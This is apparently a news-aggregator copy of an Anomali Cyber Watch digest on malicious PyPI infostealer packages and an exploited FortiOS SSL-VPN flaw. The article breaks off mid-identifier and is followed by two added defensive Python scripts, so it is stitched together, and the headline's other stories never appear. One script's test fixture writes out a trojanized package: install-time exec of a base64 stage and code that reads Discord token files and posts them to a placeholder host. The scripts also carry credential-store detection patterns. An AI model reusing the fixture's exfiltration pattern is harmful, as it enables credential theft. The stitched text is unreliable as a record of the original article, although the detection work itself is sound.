One Article Review

Home - The article:
Source Anomali
Identifier 8302291
Publication date 2023-01-18 16:35:00 (viewed: 2023-01-18 17:06:40)
Title Anomali Cyber Watch: FortiOS Zero-Day Has Been Exploited by an APT, Two RATs Spread by Four Types of JAR Polyglot Files, Promethium APT Continued Android Targeting
Text
The threat intelligence stories in this iteration of the Anomali Cyber Watch cover the following topics: APT, DDoS, polyglot files, RATs, Russia, skimmers, trojanized apps, and Ukraine. The IOCs related to these stories are attached to the Anomali Cyber Watch and can be used to check your logs for potentially malicious activity.

Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this issue and give a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Malicious 'Lolip0p' PyPI Packages Install Info-Stealing Malware (published: January 16, 2023)

On January 10, 2023, Fortinet researchers detected the actor Lolip0p offering malicious packages on the Python Package Index (PyPI). The packages came with detailed, convincing descriptions presenting them as legitimate HTTP clients or, in one case, as a legitimate improvement for a terminal user interface. Installing the libraries led to infostealing malware targeting browser data and authentication (Discord) tokens.

Analyst Comment: Free repositories such as PyPI are increasingly abused by threat actors. Before adding a package, software developers should review its author and reviews, and check the source code for any suspicious or malicious intent.

MITRE ATT&CK: [MITRE ATT&CK] T1204 - User Execution | [MITRE ATT&CK] T1555 - Credentials From Password Stores
Tags: actor:Lolip0p, Malicious package, malware-type:Infostealer, Discord, PyPI, Social engineering, Windows

Analysis of FG-IR-22-398 - FortiOS - Heap-Based Buffer Overflow in SSLVPNd (published: January 11, 2023)

In December 2022, the network security company Fortinet fixed a critical heap-based buffer overflow vulnerability (FG-IR-22-398, CVE-2022-42475) in the FortiOS SSL-VPN daemon. The vulnerability had been exploited as a zero-day by an advanced persistent threat (APT) actor who customized a Linux implant specifically for FortiOS on the relevant FortiGate hardware versions. The targeting was likely aimed at governmental or government-related targets. Attribution is unclear, but the UTC+8 compilation timezone may point to China, Russia, or several other countries.

Analyst Comment: Users of the affected products should make sure the December 2022 FortiOS security updates are applied. Zero-day attacks can sometimes be detected by less conventional methods, such as behavior analysis and heuristic or machine-learning-based detection. Network defenders are advised to monitor for suspicious traffic, such as suspicious TCP sessions carrying GET requests for payloads.

MITRE ATT&CK: [MITRE ATT&CK] T1622 - Debugger Evasion | [MITRE ATT&CK] T1190 - Exploit Public-Facing Application | [MITRE ATT&CK] T1105 - Ingress Tool Transfer | [MITRE ATT&CK] T1090 - Proxy | [MITRE ATT&CK] T1070 - Indicator Removal On Host
Tags: FG-IR-22-398, CVE-2022-42
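The PyPI analyst comment above recommends reviewing a package's author and source before adding it. The following script is an added example, not code from the Anomali report and not a reconstruction of the Lolip0p packages: it performs that review statically, walking the AST of each file without importing or executing anything, and flags the constructs that typically carry an infostealer in a trojanized package (dynamic code execution, decoding of embedded blobs, shell and network access, and string literals naming browser or Discord credential stores). It assumes Python 3.8 or later; the two sample packages and the name "tinyhttp" are constructed for this example.

```python
# Added example, not code from the Anomali report and not a reconstruction of the
# Lolip0p packages. Both sample packages are constructed; "tinyhttp" is hypothetical.
import ast
import re
from collections import namedtuple

# Dotted call targets grouped by what they usually mean inside a small library.
CALL_KINDS = {
    "dynamic-exec": {"exec", "eval", "compile", "__import__", "marshal.loads"},
    "decoder": {"base64.b64decode", "zlib.decompress"},
    "shell": {"subprocess.Popen", "subprocess.run", "os.system"},
    "network": {"urllib.request.urlopen", "requests.get", "requests.post", "socket.socket"},
}
CALL_TO_KIND = {name: kind for kind, names in CALL_KINDS.items() for name in names}
# Browser and Discord credential-store locations; an HTTP client has no reason to name them.
CREDENTIAL_PATH_RE = re.compile(
    r"Login Data|Local State|discord|Local Storage\\leveldb|\.mozilla|Cookies", re.IGNORECASE)
BLOB_RE = re.compile(r"[A-Za-z0-9+/=]{200,}")  # long base64-looking literal: likely a hidden stage

Finding = namedtuple("Finding", "file line kind detail")

def _dotted_name(node):
    """Return 'pkg.mod.func' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def review_source(path, source):
    """Flag suspicious calls and string literals in one source file (never executes it)."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=path)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in CALL_TO_KIND:
                findings.append(Finding(path, node.lineno, CALL_TO_KIND[name], name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if CREDENTIAL_PATH_RE.search(node.value):
                findings.append(Finding(path, node.lineno, "credential-store-path", node.value))
            elif BLOB_RE.fullmatch(node.value):
                findings.append(Finding(path, node.lineno, "encoded-blob", f"{len(node.value)} chars"))
    return findings

def review_package(files):
    """files maps relative path -> source text. setup.py findings sort first because
    that code runs at `pip install` time, before anything is imported."""
    findings = [f for path, src in files.items() for f in review_source(path, src)]
    findings.sort(key=lambda f: (not f.file.endswith("setup.py"), f.file, f.line))
    return findings

def verdict(findings):
    """'block' on install-time code or infostealer indicators; 'review' when only
    network/shell/decoder use outside setup.py was seen; otherwise 'clean'."""
    for f in findings:
        if f.kind in ("dynamic-exec", "credential-store-path", "encoded-blob") or f.file.endswith("setup.py"):
            return "block"
    return "review" if findings else "clean"

# Constructed sample: an HTTP helper whose only notable call is the network access its name promises.
BENIGN_PACKAGE = {
    "setup.py": 'from setuptools import setup\nsetup(name="tinyhttp", version="0.1.0")\n',
    "tinyhttp/__init__.py": (
        "import urllib.request\n\n"
        "def get(url):\n"
        "    with urllib.request.urlopen(url) as resp:\n"
        "        return resp.read()\n"),
}
# Constructed sample with the same public API plus an install-time stage and a Discord
# token-store path. The base64 literal decodes to a harmless print() and is never run here.
TROJANIZED_PACKAGE = {
    "setup.py": (
        "import base64\nfrom setuptools import setup\n"
        'stage2 = base64.b64decode("cHJpbnQoJ2hpJyk=")\n'
        "exec(stage2)\n"
        'setup(name="tinyhttp", version="0.1.0")\n'),
    "tinyhttp/__init__.py": (
        "import os\nimport requests\n\n"
        "def _collect():\n"
        '    path = os.path.expandvars(r"%APPDATA%\\discord\\Local Storage\\leveldb")\n'
        "    return os.listdir(path)\n\n"
        "def get(url):\n"
        '    requests.post("http://example.invalid/upload", files={"t": _collect()})\n'
        "    return requests.get(url).content\n"),
}

if __name__ == "__main__":
    for label, pkg in (("benign", BENIGN_PACKAGE), ("trojanized", TROJANIZED_PACKAGE)):
        hits = review_package(pkg)
        print(f"{label}: {verdict(hits)}")
        for h in hits:
            print(f"  {h.file}:{h.line} {h.kind} {h.detail}")
```

The benign package still comes back as "review" rather than "clean": a self-described HTTP client making network calls is expected, and the script's job is to hand the reviewer a short list of the lines worth reading, not to clear a package on its own. Anything in setup.py beyond plain metadata is treated as a hard stop because it executes during installation, before the developer ever imports the library. Run it against the sdist you obtain with `pip download --no-deps --no-binary :all: <package>` rather than against a wheel, so that setup.py is included.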
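The FortiOS analyst comment advises monitoring for suspicious TCP sessions carrying GET requests for payloads, which is the Ingress Tool Transfer (T1105) step the ATT&CK mapping lists. As an added example, not from the Anomali report or Fortinet's advisory, the filter below runs over HTTP session records and reports the cases where the appliance itself is the originator of a GET to an unfamiliar host and receives binary content. It assumes records in Zeek http.log field names serialized one JSON object per line; the appliance address, the vendor update host name, and the four log lines are constructed for this example.

```python
# Added example, not from the Anomali report or Fortinet's advisory. The record
# format (Zeek http.log fields serialized as JSON), the addresses and the log
# lines are all constructed for this example.
import ipaddress
import json

# Self/management addresses of the appliances under watch (hypothetical).
APPLIANCE_ADDRS = {ipaddress.ip_address("203.0.113.10")}
# Hosts an appliance is expected to fetch from on its own, e.g. the vendor's
# update service (hypothetical name). Anything else is unfamiliar.
EXPECTED_HOSTS = {"update.vendor.example"}
PAYLOAD_MIME = ("application/octet-stream", "application/x-executable",
                "application/x-elf", "application/x-sharedlib")
PAYLOAD_EXT = (".bin", ".elf", ".so", ".sh")


def is_payload_fetch(rec):
    """True when an appliance itself is the originator of a GET to an unfamiliar
    host and the response (or URI) looks like a binary payload."""
    try:
        src = ipaddress.ip_address(rec["id.orig_h"])
    except (KeyError, ValueError):
        return False
    if src not in APPLIANCE_ADDRS or rec.get("method") != "GET":
        return False
    if rec.get("host") in EXPECTED_HOSTS:
        return False
    mimes = rec.get("resp_mime_types") or []
    return any(m in PAYLOAD_MIME for m in mimes) or rec.get("uri", "").endswith(PAYLOAD_EXT)


def scan(log_text):
    """Return (ts, originator, host, uri) for every matching record."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if is_payload_fetch(rec):
            hits.append((rec["ts"], rec["id.orig_h"], rec.get("host"), rec.get("uri")))
    return hits


# Constructed records: a user browsing, the appliance fetching signatures from its
# vendor, the appliance pulling a binary from an unfamiliar bare IP, and the
# appliance fetching an HTML page (not a payload, so not reported).
SAMPLE_LOG = """
{"ts": 1671200001.1, "id.orig_h": "10.0.0.25", "id.resp_h": "198.51.100.5", "method": "GET", "host": "news.example", "uri": "/index.html", "resp_mime_types": ["text/html"]}
{"ts": 1671200002.2, "id.orig_h": "203.0.113.10", "id.resp_h": "198.51.100.9", "method": "GET", "host": "update.vendor.example", "uri": "/defs/latest.bin", "resp_mime_types": ["application/octet-stream"]}
{"ts": 1671200003.3, "id.orig_h": "203.0.113.10", "id.resp_h": "198.51.100.77", "method": "GET", "host": "198.51.100.77", "uri": "/payload.bin", "resp_mime_types": ["application/octet-stream"]}
{"ts": 1671200004.4, "id.orig_h": "203.0.113.10", "id.resp_h": "198.51.100.5", "method": "GET", "host": "news.example", "uri": "/index.html", "resp_mime_types": ["text/html"]}
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("payload fetch by appliance:", hit)
```

The signal here is the originator, not the destination: a perimeter device has a very short list of hosts it should ever download files from on its own, so an outbound GET for binary content from the device's own address to anything outside that list is worth an alert regardless of whether the destination is on any IOC list yet. Populate APPLIANCE_ADDRS and EXPECTED_HOSTS from your own inventory and vendor documentation; the values above are placeholders.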
Sent Yes
Tags Malware Tool Vulnerability Threat Guideline
Stories LastPass
Notes ★★


The article does not appear to have been picked up after its publication.


The article does not appear to be a repeat of an earlier one.